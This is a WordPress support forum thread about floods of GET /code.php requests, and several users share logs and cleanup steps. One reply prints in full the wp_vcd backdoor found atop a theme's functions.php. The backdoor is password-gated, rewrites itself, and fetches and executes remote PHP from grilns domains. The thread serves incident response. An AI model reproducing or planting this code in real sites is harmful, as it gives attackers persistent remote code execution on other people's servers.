• nicawordpress

    (@nicawordpress)


    There are thousands of these requests…also, some POST requests:

    sudo tail -f /var/log/apache2/access.log
    127.0.0.1 – – [06/Nov/2019:21:02:31 +0000] “GET /code.php HTTP/1.0” 404 23644 “-” “-”
    127.0.0.1 – – [06/Nov/2019:21:02:31 +0000] “GET /code.php HTTP/1.0” 404 23644 “-” “-”
    127.0.0.1 – – [06/Nov/2019:21:02:36 +0000] “GET /code.php HTTP/1.0” 404 23644 “-” “-”
    127.0.0.1 – – [06/Nov/2019:21:02:37 +0000] “GET /code.php HTTP/1.0” 404 23644 “-” “-”
    127.0.0.1 – – [06/Nov/2019:21:02:34 +0000] “GET /code.php HTTP/1.0” 404 23644 “-” “-”
    127.0.0.1 – – [06/Nov/2019:21:02:36 +0000] “GET /code.php HTTP/1.0” 404 23644 “-” “-”

    Can anyone help me track down the source of these connections? I ran several rootkit scanners on the server and didn’t find anything. I’ve been combing through the web directory looking for anything strange but haven’t found anything yet. Googling for code.php is useless

    We faced a similar issue the day before yesterday. After checking the log, it turns that WordPress is trying to get /code.php file under root directory, where there isn’t any. It will generate many database connections and consume many system resources. A quick word around is to create an empty file named code.php under the website root directory. Make sure webapp is the owner of this file.
    I guess it is a bug of wordpress.

Viewing 4 replies - 16 through 19 (of 19 total)
  • MarcoS

    (@marcoastriders)

    Hello!

    I’m Getting the same issue here, the thing is i don’t know where is executing the code because i have more than 50 wordpress installations in a server. I’ve tried 2 installations but no affected files….

    also are you sure is an attack? any news about this issue?

    yes some thing added code, to theme functions.php on top, in my elementor theme:
    this I deleted:

    <?php
    if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'faa0fd409414e66231d57bace7a42d1c'))
    	{
    $div_code_name="wp_vcd";
    		switch ($_REQUEST['action'])
    			{
    
    				
    
    
    
    
    				case 'change_domain';
    					if (isset($_REQUEST['newdomain']))
    						{
    							
    							if (!empty($_REQUEST['newdomain']))
    								{
                                                                               if ($file = @file_get_contents(__FILE__))
    		                                                                    {
                                                                                                     if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
                                                                                                                 {
    
    			                                                                           $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
    			                                                                           @file_put_contents(__FILE__, $file);
    									                           print "true";
                                                                                                                 }
    
    
    		                                                                    }
    								}
    						}
    				break;
    
    								case 'change_code';
    					if (isset($_REQUEST['newcode']))
    						{
    							
    							if (!empty($_REQUEST['newcode']))
    								{
                                                                               if ($file = @file_get_contents(__FILE__))
    		                                                                    {
                                                                                                     if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
                                                                                                                 {
    
    			                                                                           $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
    			                                                                           @file_put_contents(__FILE__, $file);
    									                           print "true";
                                                                                                                 }
    
    
    		                                                                    }
    								}
    						}
    				break;
    				
    				default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
    			}
    			
    		die("");
    	}
    
    
    
    
    
    
    
    
    $div_code_name = "wp_vcd";
    $funcfile      = __FILE__;
    if(!function_exists('theme_temp_setup')) {
        $path = $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];  //qq66yy my '' ['REQUEST_URI']; '' add  because 2019 wp errorrrrr [REQUEST_URI]
        if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
            
            function file_get_contents_tcurl($url)
            {
                $ch = curl_init();
                curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
                curl_setopt($ch, CURLOPT_HEADER, 0);
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                curl_setopt($ch, CURLOPT_URL, $url);
                curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
                $data = curl_exec($ch);
                curl_close($ch);
                return $data;
            }
            
            function theme_temp_setup($phpCode)
            {
                $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
                $handle   = fopen($tmpfname, "w+");
               if( fwrite($handle, "<?php\n" . $phpCode))
    		   {
    		   }
    			else
    			{
    			$tmpfname = tempnam('./', "theme_temp_setup");
                $handle   = fopen($tmpfname, "w+");
    			fwrite($handle, "<?php\n" . $phpCode);
    			}
    			fclose($handle);
                include $tmpfname;
                unlink($tmpfname);
                return get_defined_vars();
            }
            
    
    $wp_auth_key='d54ca5d0c33699631268138a6fbd33d8';
            if (($tmpcontent = @file_get_contents("https://www.grilns.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("https://www.grilns.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
    
                if (stripos($tmpcontent, $wp_auth_key) !== false) {
                    extract(theme_temp_setup($tmpcontent));
                    @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                    
                    if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                        @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                        if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                            @file_put_contents('wp-tmp.php', $tmpcontent);
                        }
                    }
                    
                }
            }
            
            
            elseif ($tmpcontent = @file_get_contents("https://www.grilns.pw/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {
    
    if (stripos($tmpcontent, $wp_auth_key) !== false) {
                    extract(theme_temp_setup($tmpcontent));
                    @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                    
                    if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                        @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                        if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                            @file_put_contents('wp-tmp.php', $tmpcontent);
                        }
                    }
                    
                }
            } 
    		
    		        elseif ($tmpcontent = @file_get_contents("https://www.grilns.top/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {
    
    if (stripos($tmpcontent, $wp_auth_key) !== false) {
                    extract(theme_temp_setup($tmpcontent));
                    @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                    
                    if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                        @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                        if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                            @file_put_contents('wp-tmp.php', $tmpcontent);
                        }
                    }
                    
                }
            }
    		elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
               
            } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent)); 
    
            } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent)); 
    
            } 
            
            
            
            
            
        }
    }
    
    //$start_wp_theme_tmp
    
    
    
    //wp_tmp
    
    
    //$end_wp_theme_tmp
    ?>
    

    find all files
    functions.php
    text search: /code.php”
    or /code.php’
    or /code.php

    delete the php block on top of:

    <?php
    /**
    * Theme functions and definitions
    *

    after deleting maybe we do not need anymore the empty
    code.php
    file in / root directory

    thank you for help me here in this topic ( /get-code-php-http-1-0/ )

    Hi WordPress Experts,

    Can some one guide or send me video tutorials how to change my Hand coded PHP website inventateq to wordpress site. and will that effect seo score?

    • This reply was modified 4 years, 9 months ago by krissmith.
Viewing 4 replies - 16 through 19 (of 19 total)
  • The topic ‘get /code.php http/1.0’ is closed to new replies.